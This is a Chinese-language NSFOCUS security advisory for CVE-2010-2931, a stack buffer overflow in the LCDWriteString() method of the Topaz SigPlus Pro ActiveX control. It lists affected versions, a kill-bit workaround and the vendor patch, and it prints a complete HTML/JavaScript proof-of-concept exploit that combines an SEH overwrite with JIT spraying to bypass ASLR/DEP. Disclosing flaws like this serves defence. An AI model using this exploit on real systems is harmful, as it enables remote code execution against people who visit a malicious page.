NSFOCUS绿盟科技

首页 -> 安全研究

安全研究

安全漏洞

SigPlus Pro ActiveX控件LCDWriteString()方式栈溢出漏洞

发布日期：2010-08-03
更新日期：2010-08-03

受影响系统：

Topaz Systems SigPlus Pro ActiveX 3.74

不受影响系统：

Topaz Systems SigPlus Pro ActiveX 3.95

描述：

CVE(CAN) ID: CVE-2010-2931

SigPlus Pro ActiveX是一款电子签名软件，允许使用ActiveX创建应用或查看电子签名的文档。

SigPlus Pro ActiveX控件（SigPlus.ocx）没有正确地处理传送给LCDWriteString()方式的HexString参数，用户受骗访问了恶意网页并向该方式传送了超长字符串参数就可以触发栈溢出，导致执行任意代码。

<*来源：mr_me

链接：http://secunia.com/advisories/40818/
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>

<object classid='clsid:69A40DA3-4D42-11D0-86B0-0000C025864A' id='target' ></object>

<object id='spray' classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="780" height="420"></object>

<script>



        function rockAndRoll()

        {

            var buffSize = 477;

            var x = unescape("%41");

            while (x.length<buffSize) x += x;

            x = x.substring(0,buffSize);



            // you may need to change this value

            var seh = unescape("%01%01%22%0d");

            var y = unescape("%42");

            var buffSize1 = 5140;

            while (y.length<buffSize1) y += y;

            y = y.substring(0,buffSize1);



            alert('Do you feel lucky, punk?')

            target.LCDWriteString(1,1,1,1,1,1,1,x+seh+y);

        }



    spray.Movie="jit-spray.swf";

    setTimeout('rockAndRoll()',10000);

</script>

<body>

<p><center>~ mr_me presents ~</p>

<p><b>SigPlus Pro v3.74 0day ActiveX LCDWriteString() Remote Buffer Overflow JIT Spray - aslr/dep bypass</b></center></p>

</body>



</html>

建议：

临时解决方法：

* 为clsid 69A40DA3-4D42-11D0-86B0-0000C025864A设置kill bit。

厂商补丁：

Topaz Systems
-------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.topazsystems.com/Software/download/sigplusactivex.htm

浏览次数：3123
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客